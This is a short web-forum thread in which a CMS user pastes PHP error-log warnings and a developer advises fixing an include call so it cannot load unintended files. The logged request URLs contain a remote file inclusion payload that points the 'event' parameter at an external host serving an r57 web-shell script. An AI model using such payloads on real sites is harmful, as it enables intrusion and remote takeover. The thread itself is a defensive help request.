Worrying Signs in the Error Log!

3 posts by 3 authors in: Forums > CMS Builder
Last Post: June 11, 2015   (RSS)

By Perchpole - June 8, 2015

Hello, All -

It's a great feature but my stomach drops when I view the error log sometimes! Look at the latest couple of entries:

Jun 8th, 2015 - 01:43:58 AM
E_WARNING: include(/kunden/path/inc.temp/.php): failed to open stream: No such file or directory
/path/index.php (line 123)
http://www.mysite.info/index.php?event=http://www.tartak-przewozny.com.pl/templates/atomic/r57.txt?

Jun 8th, 2015 - 01:43:58 AM
E_WARNING: include(): Failed opening '/kunden/path/inc.temp/.php' for inclusion (include_path='/path/cmsb:/path/cmsb/3rdParty:.:/usr/lib/php5.4:/path/inc.code/phpQuery/:/path/inc.code/phpQuery/plugins/')
/path/index.php (line 123)
http://www.mysite.info/index.php?event=http://www.tartak-przewozny.com.pl/templates/atomic/r57.txt?

Why am I attracting such attention?!

Better still, how do I ward them off?

:o(

Perch

By Dave - June 11, 2015

Mainly, you just need to update your code in /path/index.php (line 123) that tries to load a non-existent file: /kunden/path/inc.temp/.php  And make sure it can't be tricked into loading files it's not suppose to.

That fact that people are constantly running automated hack attempts on your website is just how it is for every website on the internet.

Let me know any questions.

Dave Edis - Senior Developer
interactivetools.com